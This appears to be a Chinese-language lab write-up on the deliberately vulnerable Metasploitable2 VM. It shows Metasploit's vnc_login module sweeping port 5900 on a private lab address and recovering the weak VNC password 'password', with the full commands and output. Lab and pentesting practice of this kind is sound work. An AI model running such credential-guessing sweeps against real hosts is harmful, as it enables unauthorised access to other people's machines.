Metasploitable2 - tcp port 5900 - vnc

VNC,是 Virtual Network Computer 的缩写. 主要用于图形界面管理主机.

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.1.111
RHOSTS => 192.168.1.111
msf auxiliary(vnc_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(vnc_login) > run

[*] 192.168.1.111:5900 - Starting VNC login sweep
[*] 192.168.1.111:5900 VNC - [1/2] - Attempting VNC login with password ''
[*] 192.168.1.111:5900 VNC - [1/2] - , VNC server protocol version : 3.3
[-] 192.168.1.111:5900 VNC - [1/2] - , Authentication failed
[*] 192.168.1.111:5900 VNC - [2/2] - Attempting VNC login with password 'password'
[*] 192.168.1.111:5900 VNC - [2/2] - , VNC server protocol version : 3.3
[+] 192.168.1.111:5900, VNC server password : "password"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

VNC 弱密码: password, 登陆后如下图所示:


Metasploitable2 - tcp port 5900 - vnc_第1张图片

你可能感兴趣的:(Metasploit,Pentesting,Metasploitable2)